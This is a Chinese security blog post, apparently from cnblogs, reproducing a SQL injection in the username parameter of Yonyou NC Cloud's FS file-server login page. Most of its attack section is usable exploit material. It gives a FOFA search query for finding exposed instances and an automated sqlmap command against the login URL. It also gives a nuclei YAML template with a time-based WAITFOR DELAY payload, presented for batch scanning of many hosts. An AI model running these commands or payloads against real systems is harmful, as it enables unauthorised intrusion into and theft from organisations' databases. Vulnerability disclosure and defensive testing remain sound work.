首页 > 数据库 >用友NC Cloud FS文件服务器SQL注入

用友NC Cloud FS文件服务器SQL注入

时间:2023-09-07 15:56:58浏览次数:54  
标签:文件 FS NC 用友 SQL Cloud

漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入。

漏洞影响

用友NC Cloud且存在FS文件服务器配置管理登录页面。

漏洞复现

fofa语法:app="用友-NC-Cloud" && icon_hash="1596996317"
用友NC Cloud登录页面如下:

在应用中存在文件服务器管理登录页面
http://xxx.xxx.xxx.xxx/fs/

拦截文件服务器页面的登录请求数据包,然后直接sqlmap梭哈。
sqlmap -u "http://IP:PORT/fs/console?username=admin&password=%2Bz3VgEDJpVuEHdRPPzbCFTCa9Q0sKLOZ5q4ZLhxjuok%3D" --batch -p username

nuclei批量yaml文件

id: yonyou_NCCloud_FS_sqli

info:
  name: 用友 NCCloud FS文件管理SQL注入
  author: mczilong
  severity: critical
  tags: yonyou 
  description: fofa   "NCCloud"
requests:
  - raw:
      - |
        @timeout: 15s
        GET /fs/console?username=222%27;WAITFOR%20DELAY%20%270:0:8%27--&password=WiEZoxowjDhBk7bfE9nvzP3TjiK/RivMT1jKxrq42bI HTTP/1.1
        Host: {{Hostname}}        

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=8'

标签:文件,FS,NC,用友,SQL,Cloud
From: https://www.cnblogs.com/pursue-security/p/17685151.html

相关文章

  • 用友NC service接口信息泄露漏洞
    漏洞描述用友nc有个接口可以获取数据库账户密码,不过是老版本了漏洞复现fofa语法:app="用友-UFIDA-NC"POC:/uapws/servicenuclei批量yaml文件id:yonyou_NC-uapws-server-apiinfo:name:yonyou_NC-uapws-server-apiauthor:nigoriseverity:highdescription:f......
  • SQLServer数据库DBCC CHECKIDENT命令介绍
    在SQLServer输入数据时,碰到有主键ID需要维护时,可使用IDENT_CURRENT和CHECKIDENT命令来维护。 IDENT_CURRENT命令返回指定表或视图生成的最后一个标识值。用法如下:      IDENT_CURRENT('table_name') 返回类型numeric(38,0).  DBCC CHECKIDENT命令用于检查或......
  • golang操作mysql
    golang操作mysql在Go语言中,你可以使用第三方库来进行MySQL数据库的操作。其中,比较常用的库有database/sql和github.com/go-sql-driver/mysql在安装了MySQL的前提下进行以下操作1下载依赖在终端执行命令:goget-ugithub.com/go-sql-driver/mysql2导入依赖库import(......
  • 用友NC 6.5未授权文件上传漏洞
    漏洞描述用友NC6.5版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务器控制权限。影响版本NC6.5漏洞复现fofa语法:app="用友-UFIDA-NC"访问页面POC脚本如下:importrequestsimportthreadpoolimporturllib3importsysimportargparseurllib3.di......
  • map、sync.map、concurrent-map适用场景与源码解析
    最近一直加班,无论工作日还是周末,虽然每天很忙但总感觉空空的,很少有时间停下来思考与总结。项目中各种甩锅,最后最苦逼的还是落到了研发的头上,文档编写、环境部署、问题排查虐得一遍又一遍。事情杂乱,研发效率超级低,不知道何是是个头呀背景在go中,map是最常用的集合之一。其底层key存......
  • 【错误记录】Android Studio 创建 Module 模块报错 ( Cannot resolve external depend
    文章目录一、报错信息二、解决方案目前使用的是最新的Gradle配置,创建Module生成的源码与Gradle配置出现了冲突,导致的问题;解决此类问题,要仔细检查Gradle构建脚本,排查每个依赖库的来源;本次错误就是AS系统自动成的Module修改了Gradle构建脚本,导......
  • Mysql 数据库的数据大小查看
    Mysql数据库的数据大小查看:1、进入information_schema数据库(存放了其他的数据库的信息)mysql->useinformation_schema;2、查询所有数据的大小:mysql->selectconcat(round(sum(data_length/1024/1024),2),'MB')asdatafromtables;3、查看指定数据库的大小:比如查看数据库h......
  • 用友GRP-U8 Proxy SQL注入 CNNVD-201610-923
    漏洞描述用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载外部SQL语句,以及命令执行影响版本用友GRP-U8行政事业内控管理软件(新政府会计制度专版)漏洞复现fofa语法:title="用友GRP-U8行政事业内控管理软件"登录页面:POC:POST/ProxyHT......
  • pagehelper分页框架进行定时跑批分页 在插入与sql语句的编写,当插入有库中有报异常显示
    以下是一个示例的业务类,使用PageHelper分页框架进行定时跑批分页插入操作,并在遇到重复数据时跳过继续插入:importcom.github.pagehelper.PageHelper;importcom.github.pagehelper.PageInfo;importorg.springframework.beans.factory.annotation.Autowired;importorg.spring......
  • MySQL数据库基础与实战应用
    ......